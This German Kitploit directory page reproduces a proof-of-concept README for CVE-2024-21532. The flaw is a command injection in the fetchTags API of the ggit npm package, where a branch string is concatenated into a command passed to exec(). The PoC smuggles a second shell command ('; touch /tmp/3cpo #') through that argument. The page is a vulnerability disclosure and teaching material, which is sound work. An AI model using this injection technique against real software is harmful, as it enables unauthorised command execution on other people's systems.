Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-21532-PoC-ggit — Proof-of-Concept-Exploit für CVE-2024-21532, eine Befehlsinjektions-Schwachstelle in der fetchTags API des ggit npm-Pakets, die unsichere exec()-Verwendung demonstriert. | Kitploit
Tools/GitHubGitHub/lirantal/cve-2024-21532-poc-ggit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPapers & ForschungLernen & Bildung
GitHublirantal/cve-2024-21532-poc-ggit

CVE-2024-21532-PoC-ggit

Proof-of-Concept-Exploit für CVE-2024-21532, eine Befehlsinjektions-Schwachstelle in der fetchTags API des ggit npm-Pakets, die unsichere exec()-Verwendung demonstriert.

Repository anzeigen
2vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-21532 Command Injection-Schwachstelle in ggit

ggit beschreibt sich selbst als:

root@kitploit:~
Local promise-returning git command wrappers

Ressourcen:

  • Projektquellcode auf GitHub: https://github.com/bahmutov/ggit
  • npm-Paket des Projekts: https://www.npmjs.com/package/ggit

Artikel über diese Sicherheitslücke: https://nodejs-security.com/blog/flawed-git-promises-library-on-npm-leads-to-command-injection-vulnerability

Hintergrund zur Ausnutzung

Ich melde eine Command Injection-Sicherheitslücke im npm-Paket ggit.

Diese Sicherheitslücke zeigt sich in der fetchTags(branch)-API der Bibliothek, die es ermöglicht, dass Benutzereingaben den abzurufenden Branch spezifizieren. Diese Zeichenkette wird dann mit einem git-Befehl verkettet, der anschließend an die unsichere exec()-API des Node.js Child-Prozesses übergeben wird.

Exploit

  1. Installieren Sie [email protected] oder eine frühere Version
  2. Richten Sie den folgenden POC ein:
root@kitploit:~
const fetchTags = require("ggit").fetchTags;
fetchTags("; touch /tmp/3cpo #").then(function () {
  // should be same as running command
  // git pull origin --tags
  console.log("done");
});
  1. Beobachten Sie, dass eine neue Datei unter /tmp/3cpo erstellt wird.

Mitwirken

Bitte lesen Sie CONTRIBUTING für Richtlinien zur Mitarbeit an diesem Projekt.

Autor

Liran Tal

Tool herunterladen